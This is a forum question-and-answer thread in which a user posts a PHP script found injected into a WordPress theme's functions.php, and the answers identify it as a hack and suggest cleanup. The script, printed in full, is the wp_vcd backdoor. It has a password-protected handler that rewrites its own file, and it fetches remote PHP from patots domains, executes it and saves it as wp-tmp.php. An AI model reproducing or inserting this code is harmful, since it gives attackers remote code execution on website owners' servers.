# WordPress Functions.php - Weird Script

Tags: wordpress, function

At the moment whenever I'm working on a WordPress web site I have the following code which keeps automatically adding to the top of the functions.php file, this is happening locally on my laptop.

Please advise, here's the script:-

```
<?php
    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '803ee29202dba58355290373a7e208fa'))
        {
    $div_code_name="wp_vcd";
            switch ($_REQUEST['action'])
                {






                    case 'change_domain';
                        if (isset($_REQUEST['newdomain']))
                            {

                                if (!empty($_REQUEST['newdomain']))
                                    {
                                                                               if ($file = @file_get_contents(__FILE__))
                                                                                {
                                                                                                     if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                                                                                                                 {

                                                                                           $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                                                                                           @file_put_contents(__FILE__, $file);
                                                                   print "true";
                                                                                                                 }


                                                                                }
                                    }
                            }
                    break;

                                    case 'change_code';
                        if (isset($_REQUEST['newcode']))
                            {

                                if (!empty($_REQUEST['newcode']))
                                    {
                                                                               if ($file = @file_get_contents(__FILE__))
                                                                                {
                                                                                                     if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
                                                                                                                 {

                                                                                           $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                                                                                           @file_put_contents(__FILE__, $file);
                                                                   print "true";
                                                                                                                 }


                                                                                }
                                    }
                            }
                    break;

                    default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
                }

            die("");
        }








    $div_code_name = "wp_vcd";
    $funcfile      = __FILE__;
    if(!function_exists('theme_temp_setup')) {
        $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
        if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

            function file_get_contents_tcurl($url)
            {
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
                curl_setopt($ch, CURLOPT_HEADER, 0);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                curl_setopt($ch, CURLOPT_URL, $url);
                curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
                $data = curl_exec($ch);
                curl_close($ch);
                return $data;
            }

            function theme_temp_setup($phpCode)
            {
                $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
                $handle   = fopen($tmpfname, "w+");
               if( fwrite($handle, "<?php\n" . $phpCode))
               {
               }
                else
                {
                $tmpfname = tempnam('./', "theme_temp_setup");
                $handle   = fopen($tmpfname, "w+");
                fwrite($handle, "<?php\n" . $phpCode);
                }
                fclose($handle);
                include $tmpfname;
                unlink($tmpfname);
                return get_defined_vars();
            }


    $wp_auth_key='74278a0b1580c2851b6ef39c8f1560a5';
            if (($tmpcontent = @file_get_contents("http://www.patots.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.patots.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

                if (stripos($tmpcontent, $wp_auth_key) !== false) {
                    extract(theme_temp_setup($tmpcontent));
                    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                        @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                        if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                            @file_put_contents('wp-tmp.php', $tmpcontent);
                        }
                    }

                }
            }


            elseif ($tmpcontent = @file_get_contents("http://www.patots.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

    if (stripos($tmpcontent, $wp_auth_key) !== false) {
                    extract(theme_temp_setup($tmpcontent));
                    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                        @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                        if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                            @file_put_contents('wp-tmp.php', $tmpcontent);
                        }
                    }

                }
            } 

                    elseif ($tmpcontent = @file_get_contents("http://www.patots.top/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

    if (stripos($tmpcontent, $wp_auth_key) !== false) {
                    extract(theme_temp_setup($tmpcontent));
                    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                        @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                        if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                            @file_put_contents('wp-tmp.php', $tmpcontent);
                        }
                    }

                }
            }
            elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));

            } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent)); 

            } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent)); 

            } 





        }
    }

    //$start_wp_theme_tmp



    //wp_tmp


    //$end_wp_theme_tmp
    ?>
```

Answer (score 2, accepted):

Your website has been hacked.

It loads malicious content from `http://www.patots.pw/code.php`. It also seems like it's trying to set a master password to bypass normal authentication.

I would advise that you **delete all files** to ensure the threat has gone.

This has likely come from trying to install either:

A) "Free" plugins from an obscure source.

B) "Free" themes from an obscure source.

See [here](https://medium.com/@rakshitshah/wordpress-wp-vcd-malware-attack-e7394801895d) and [here](https://wordpress.stackexchange.com/questions/281611/what-is-this-code-in-my-themes-functions-php-if-isset-requestaction/281612) for more information.

Answer (score 0):

As ProEvilz said your site has been hacked. Maybe your server hacked too. You can also try installing Wordpress security plugin like Wordfence and do a scan.